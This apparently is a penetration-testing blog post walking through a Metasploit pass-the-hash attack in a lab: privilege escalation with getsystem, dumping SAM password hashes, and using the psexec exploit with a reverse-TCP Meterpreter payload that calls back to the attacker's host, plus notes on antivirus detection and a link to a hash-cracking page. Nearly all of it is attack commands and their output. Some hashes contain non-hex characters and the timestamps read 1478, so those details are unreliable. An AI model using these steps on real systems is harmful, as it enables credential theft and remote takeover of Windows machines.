control – metasploit pass the hash

Note – pass the hash only seems to work with local accounts stored in the SAM

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY removed2e0c9b7removed8c6d87494f5…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
meterpreter > use priv
[-] The ‘priv’ extension has already been loaded.
meterpreter > getsystem
…got system (via technique 1).
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY removed2e0c9b7removed8c6d87494f5…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…

No users with password hints on this system

[*] Dumping password hashes…

Administrator:500:abcb51404eeab51404eeaad3b:28scfe0d16ae93f9e12:::
Guest:501:removed2e0c9b7removed8c6d87494f5:removed2e0c9b7removed8c6d87494f5:::
mark:1003:abc3b4178ab51404eeaad3b:47741scfe0d16ae931a0d6329f9 :::

meterpreter >

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.28.2
msf exploit(psexec) > set rhost 192.168.28.9
msf exploit(psexec) > set smbuser Administrator
msf exploit(psexec) > set SMBPass abcb51404eeab51404eeaad3b:28scfe0d16ae93f9e12
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.28.2:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.28.9:445|WORKGROUP as user ”…

[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.

———————————————————-

Note it failed I believe because the local machine gets confused seeing administrator as this is also a AD DC user and not stored in the SAM.

———————————————————-

Testing one of the local users on the machine works.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.28.2
msf exploit(psexec) > set rhost 192.168.28.9
msf exploit(psexec) > set smbuser mark
msf exploit(psexec) > set SMBPass abc3b4178ab51404eeaad3b:47741scfe0d16ae931a0d6329f9
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.28.2:4444
[*] Connecting to the server…
[*] Authenticating to 192.168.28.9:445|WORKGROUP as user ‘mark’…
[*] Uploading payload…
[*] Created \yyxZqluJ.exe…
[*] Binding to @ncacn_np:192.168.28.9[\svcctl] …
[*] Bound to @ncacn_np:192.168.28.9[\svcctl] …
[*] Obtaining a service manager handle…
[*] Creating a new service (ghyrYzdt – “MYjsoBisnV”)…
[*] Closing service handle…
[*] Opening service…
[*] Starting the service…
[*] Removing the service…
[*] Closing service handle…
[*] Deleting \yyxZqluJ.exe…
[*] Sending stage (764928 bytes) to 192.168.28..9
[*] Meterpreter session 1 opened (192.168.28.2:4444 -> 192.168.28.9:1414) at 1478-02-01 09:24:35 +0100

——————————————————-

Testing with AV – picks this up as Trojan horse Generic18.CFYT

Below testing against Win7 and AVG enabled.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost Local-IP-Address
msf exploit(psexec) > set rhost Remote-IP-Address
msf exploit(psexec) > set smbuser test1
msf exploit(psexec) > set SMBPass 04eeaad3b435b51404ee:8846f7eaee8fb117ad06b
msf exploit(psexec) > exploit

[*] Started reverse handler on Local-IP-Address:443
[*] Connecting to the server…
[*] Authenticating to Remote-IP-Address:445|WORKGROUP as user ‘test1’…
[*] Uploading payload…
[*] Created \xEDjSYLP.exe…
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:Remote-IP-Address[\svcctl] …
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:Remote-IP-Address[\svcctl] …
[*] Obtaining a service manager handle…
[*] Creating a new service (UoWGiOSH – “MzifhLxESA”)…
[*] Closing service handle…
[*] Opening service…
[*] Starting the service…
[*] Removing the service…
[*] Closing service handle…
[*] Deleting \xEDjSYLP.exe…
[*] Sending stage (764928 bytes) to Remote-IP-Address
[*] Meterpreter session 5 opened (Local-IP-Address:443 -> Remote-IP-Address:49169) at 1478-09-14 12:37:44 +0100

meterpreter >

——————————————

If you see this [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect when trying to get hash

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > ps

Process List
============

PID PPID Name — —- —- 0 0 [System Process] 4 0 System 272 4 smss.exe 356 348 csrss.exe 368 864 dwm.exe 404 348 wininit.exe 412 396 csrss.exe 416 288 explorer.exe 452 396 winlogon.exe 500 404 services.exe 508 404 lsass.exe 516 404 lsm.exe 604 500 svchost.exe 660 500 VBoxService.exe 712 500 svchost.exe 820 500 svchost.exe 864 500 svchost.exe 896 500 svchost.exe 940 1808 SearchFilterHost.exe 996 820 audiodg.exe 1068 500 svchost.exe 1148 500 svchost.exe 1252 500 spoolsv.exe 1300 500 svchost.exe 1380 500 wmpnetwk.exe 1532 416 VBoxTray.exe 1652 416 Project1.exe 1744 500 svchost.exe 1808 500 SearchIndexer.exe 2008 500 taskhost.exe 2056 500 svchost.exe 2212 1808 SearchProtocolHost.exe 2248 500 svchost.exe 2420 604 WmiPrvSE.exe 3100 500 sppsvc.exe 3128 500 svchost.exe Arch Session User Path
—- ——- —- —-
4294967295
x86 0
x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
x86 1 test-PC\test C:\Windows\system32\Dwm.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
x86 1 test-PC\test C:\Windows\Explorer.EXE
x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\VBoxService.exe
x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchFilterHost.exe
x86 0
x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
x86 1 test-PC\test C:\Windows\System32\VBoxTray.exe
x86 1 test-PC\test C:\Users\test\Desktop\Project1.exe
x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
x86 1 test-PC\test C:\Windows\system32\taskhost.exe
x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchProtocolHost.exe
x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\sppsvc.exe
x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe

AVG picks this up as Trojan horse Generic18.CFYT (c:\Windows\nBIOkNNE.exe)

To try and crack link

https://myexploit.wordpress.com/control-hashcat-hash-cracker/

myexploit

twitter @myexploit2600

control – metasploit pass the hash

Leave a comment Cancel reply

Share this:

Leave a comment Cancel reply